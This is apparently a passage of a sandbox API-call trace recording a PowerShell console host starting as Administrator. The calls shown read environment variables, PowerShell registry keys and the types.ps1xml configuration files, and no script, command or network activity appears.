	[0673.621] GetConsoleTitleW (in: lpConsoleTitle=0x1b87f880, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0675.321] CoTaskMemFree (pv=0x1b87f880) 
	[0675.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0675.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0675.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0675.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0677.164] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0677.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0677.164] CoTaskMemFree (pv=0x444820) 
	[0677.171] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x30c
	[0677.173] CoCreateGuid (in: pguid=0x26dd10 | out: pguid=0x26dd10*(Data1=0xa63350a, Data2=0x3d8c, Data3=0x4d30, Data4=([0]=0x9d, [1]=0x8, [2]=0xb5, [3]=0x40, [4]=0x98, [5]=0x63, [6]=0x63, [7]=0x9b))) returned 0x0
	[0677.174] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0677.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0677.174] CoTaskMemFree (pv=0x444820) 
	[0678.806] WinSqmIsOptedIn () returned 0x0
	[0678.808] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0678.808] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.808] CoTaskMemFree (pv=0x444820) 
	[0678.814] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0678.814] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.814] CoTaskMemFree (pv=0x444820) 
	[0678.815] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0678.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.815] CoTaskMemFree (pv=0x444820) 
	[0678.818] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0678.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.818] CoTaskMemFree (pv=0x444820) 
	[0678.820] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0678.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.820] CoTaskMemFree (pv=0x444820) 
	[0678.829] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0678.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.829] CoTaskMemFree (pv=0x444820) 
	[0678.829] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0678.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.829] CoTaskMemFree (pv=0x444820) 
	[0678.830] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0678.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.830] CoTaskMemFree (pv=0x444820) 
	[0678.832] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0678.832] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.832] CoTaskMemFree (pv=0x444820) 
	[0678.837] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0678.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.838] CoTaskMemFree (pv=0x444820) 
	[0678.838] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0678.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.838] CoTaskMemFree (pv=0x444820) 
	[0678.838] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0678.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.839] CoTaskMemFree (pv=0x444820) 
	[0682.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0682.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0682.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0682.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0686.650] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0686.650] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0686.650] CoTaskMemFree (pv=0x444820) 
	[0686.652] CoTaskMemAlloc (cb=0xcc) returned 0x4554e0
	[0686.652] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x4554e0, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS") returned 0x76
	[0686.652] CoTaskMemFree (pv=0x4554e0) 
	[0686.652] CoTaskMemAlloc (cb=0xf0) returned 0x1b876db0
	[0686.652] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b876db0, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0686.652] CoTaskMemFree (pv=0x1b876db0) 
	[0686.652] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d888 | out: phkResult=0x26d888*=0x2e8) returned 0x0
	[0688.483] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d80c, lpData=0x0, lpcbData=0x26d808*=0x0 | out: lpType=0x26d80c*=0x2, lpData=0x0, lpcbData=0x26d808*=0x6c) returned 0x0
	[0688.483] CoTaskMemAlloc (cb=0x70) returned 0x3f2020
	[0688.483] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d7dc, lpData=0x3f2020, lpcbData=0x26d7d8*=0x6c | out: lpType=0x26d7dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x26d7d8*=0x6c) returned 0x0
	[0688.483] CoTaskMemFree (pv=0x3f2020) 
	[0688.483] CoTaskMemAlloc (cb=0xcc) returned 0x4554e0
	[0688.483] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x4554e0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0688.484] CoTaskMemFree (pv=0x4554e0) 
	[0688.484] CoTaskMemAlloc (cb=0xcc) returned 0x4554e0
	[0688.484] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x4554e0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0688.484] CoTaskMemFree (pv=0x4554e0) 
	[0688.488] RegCloseKey (hKey=0x2e8) returned 0x0
	[0688.488] CoTaskMemAlloc (cb=0xcc) returned 0x4554e0
	[0688.488] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x4554e0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0688.488] CoTaskMemFree (pv=0x4554e0) 
	[0688.488] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d888 | out: phkResult=0x26d888*=0x2e8) returned 0x0
	[0688.488] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d80c, lpData=0x0, lpcbData=0x26d808*=0x0 | out: lpType=0x26d80c*=0x0, lpData=0x0, lpcbData=0x26d808*=0x0) returned 0x2
	[0688.488] RegCloseKey (hKey=0x2e8) returned 0x0
	[0688.499] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0688.499] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0688.499] CoTaskMemFree (pv=0x444820) 
	[0688.502] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0688.502] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0688.502] CoTaskMemFree (pv=0x444820) 
	[0688.506] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0688.506] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0688.506] CoTaskMemFree (pv=0x444820) 
	[0688.506] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0688.506] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0688.507] CoTaskMemFree (pv=0x444820) 
	[0688.508] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d678 | out: phkResult=0x26d678*=0x2e8) returned 0x0
	[0688.509] RegQueryValueExW (in: hKey=0x2e8, lpValueName="path", lpReserved=0x0, lpType=0x26d68c, lpData=0x0, lpcbData=0x26d688*=0x0 | out: lpType=0x26d68c*=0x1, lpData=0x0, lpcbData=0x26d688*=0x74) returned 0x0
	[0688.509] RegQueryValueExW (in: hKey=0x2e8, lpValueName="path", lpReserved=0x0, lpType=0x26d5fc, lpData=0x0, lpcbData=0x26d5f8*=0x0 | out: lpType=0x26d5fc*=0x1, lpData=0x0, lpcbData=0x26d5f8*=0x74) returned 0x0
	[0688.510] CoTaskMemAlloc (cb=0x78) returned 0x3f2020
	[0688.510] RegQueryValueExW (in: hKey=0x2e8, lpValueName="path", lpReserved=0x0, lpType=0x26d5cc, lpData=0x3f2020, lpcbData=0x26d5c8*=0x74 | out: lpType=0x26d5cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x26d5c8*=0x74) returned 0x0
	[0688.510] CoTaskMemFree (pv=0x3f2020) 
	[0688.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x26d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0688.510] SetErrorMode (uMode=0x1) returned 0x1
	[0688.510] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x26d550 | out: lpFileInformation=0x26d550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0688.510] SetErrorMode (uMode=0x1) returned 0x1
	[0688.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0688.511] SetErrorMode (uMode=0x1) returned 0x1
	[0688.511] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d550 | out: lpFileInformation=0x26d550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0688.511] SetErrorMode (uMode=0x1) returned 0x1
	[0688.514] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0688.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0688.514] CoTaskMemFree (pv=0x444820) 
	[0688.515] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0688.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0688.515] CoTaskMemFree (pv=0x444820) 
	[0688.516] GetACP () returned 0x4e4
	[0690.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0690.184] SetErrorMode (uMode=0x1) returned 0x1
	[0690.185] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0690.186] GetFileType (hFile=0x304) returned 0x1
	[0690.186] SetErrorMode (uMode=0x1) returned 0x1
	[0690.186] GetFileType (hFile=0x304) returned 0x1
	[0690.187] ReadFile (in: hFile=0x304, lpBuffer=0x2c68d38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2c68d38*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0690.457] ReadFile (in: hFile=0x304, lpBuffer=0x2c68d38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2c68d38*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0690.458] ReadFile (in: hFile=0x304, lpBuffer=0x2c68d38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2c68d38*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0690.459] ReadFile (in: hFile=0x304, lpBuffer=0x2c68d38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2c68d38*, lpNumberOfBytesRead=0x26d488*=0xcf3, lpOverlapped=0x0) returned 1
	[0690.459] ReadFile (in: hFile=0x304, lpBuffer=0x2c68193, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2c68193*, lpNumberOfBytesRead=0x26d488*=0x0, lpOverlapped=0x0) returned 1
	[0690.459] ReadFile (in: hFile=0x304, lpBuffer=0x2c68d38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2c68d38*, lpNumberOfBytesRead=0x26d488*=0x0, lpOverlapped=0x0) returned 1
	[0690.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0690.462] SetErrorMode (uMode=0x1) returned 0x1
	[0690.462] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d400 | out: lpFileInformation=0x26d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0690.462] SetErrorMode (uMode=0x1) returned 0x1
	[0690.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0690.463] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4e8 | out: phkResult=0x26d4e8*=0x304) returned 0x0
	[0690.463] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d46c, lpData=0x0, lpcbData=0x26d468*=0x0 | out: lpType=0x26d46c*=0x1, lpData=0x0, lpcbData=0x26d468*=0x56) returned 0x0
	[0690.463] CoTaskMemAlloc (cb=0x5a) returned 0x466390
	[0690.464] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d43c, lpData=0x466390, lpcbData=0x26d438*=0x56 | out: lpType=0x26d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d438*=0x56) returned 0x0
	[0690.464] CoTaskMemFree (pv=0x466390) 
	[0690.464] RegCloseKey (hKey=0x304) returned 0x0
	[0690.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0690.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0690.486] VirtualQuery (in: lpAddress=0x26c1d0, lpBuffer=0x26d090, dwLength=0x30 | out: lpBuffer=0x26d090*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0692.293] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0692.294] GetFileType (hFile=0x304) returned 0x1
	[0692.294] SetErrorMode (uMode=0x1) returned 0x1
	[0692.294] GetFileType (hFile=0x304) returned 0x1
	[0692.294] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.295] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.296] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.297] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.297] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.298] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.299] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.299] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.299] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.301] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.301] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.301] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.302] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.302] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.302] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.303] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
